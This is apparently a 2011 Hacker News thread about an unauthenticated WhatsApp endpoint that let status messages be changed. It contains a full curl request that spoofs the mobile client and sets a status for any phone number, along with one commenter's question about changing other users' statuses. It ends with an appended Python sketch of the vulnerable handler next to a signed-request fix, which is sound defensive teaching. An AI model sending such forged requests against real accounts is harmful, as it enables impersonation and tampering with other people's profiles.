The site says the hole has been patched but I was just able to change my own status with this:<p><pre><code> curl -A "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/iPhone_4" --header "Accept-Language: en-us" --header "Accept-Encoding: gzip, deflate" --header "Connection: keep-alive" -d "cc=1&me=%2B1{10_DIGIT_NUMBER}&s={URL_ENCODED_STATUS}" https://s.whatsapp.net/client/iphone/u.php
</code></pre>
It did take some time to show up under my name, even after restarting the app.
Did anybody have any success with changing someone else's status with this? If so, please post.<p>I got the success message on the site and restarted the app too on iPhone by killing it from the multitasking bar, but my friend's status is still unchanged.<p>Makes me doubt it is a fraud site as BuddhaSource mentioned.
Some more information about this can be found here: <a href="http://packetstormsecurity.org/files/108010/SA-20111219-1.txt" rel="nofollow">http://packetstormsecurity.org/files/108010/SA-20111219-1.txt</a>
There are a few ways that they can patch this. I'm assuming that there's some sort of auth process in place for their HTTP calls and this could simply be a case where this particular endpoint missed the auth.<p>Or they're simply blocking the whatsappstatus's IP and a fix would actually require both client side and server side changes.<p>But honestly it's just a messaging app and how many people really care if "let's go grab a beer" is encrypted or not?
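Added example, not part of the thread and not WhatsApp's code: a sketch of the "endpoint missed the auth" case discussed above, with a handler that trusts the `me` field next to one that requires proof of ownership of that number. The per-device secrets, the HMAC signature scheme, the function names and the phone numbers are all assumptions constructed for illustration; only the `cc`/`me`/`s` body fields come from the request posted in the thread.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed sample data: per-device secrets issued at registration (hypothetical scheme).
SECRETS = {"+15550100001": b"alice-device-secret", "+15550100002": b"bob-device-secret"}
STATUS = {"+15550100001": "Available", "+15550100002": "Available"}


def _fields(body: str):
    """Parse the form body shape seen in the thread (cc, me, s)."""
    form = parse_qs(body, keep_blank_values=True)
    return form["me"][0], form["s"][0]


def update_status_unauthenticated(body: str) -> int:
    """Missing-auth behaviour: whoever names a number in `me` may write its status."""
    me, status = _fields(body)
    if me not in STATUS:
        return 404
    STATUS[me] = status
    return 200


def sign(secret: bytes, body: str) -> str:
    """Client side: MAC over the exact request body with the device secret."""
    return hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()


def update_status_authenticated(body: str, signature: str) -> int:
    """Server-side fix: accept the write only if the caller holds the secret for `me`."""
    try:
        me, status = _fields(body)
    except KeyError:
        return 400
    secret = SECRETS.get(me)
    if secret is None:
        return 401  # unknown account gets the same answer as a bad signature
    expected = sign(secret, body)
    # Constant-time comparison; bytes on both sides so odd input cannot raise.
    if not hmac.compare_digest(expected.encode(), signature.encode()):
        return 401
    STATUS[me] = status
    return 200
```

A real scheme would also put a nonce or timestamp inside the signed body so a captured request cannot be replayed.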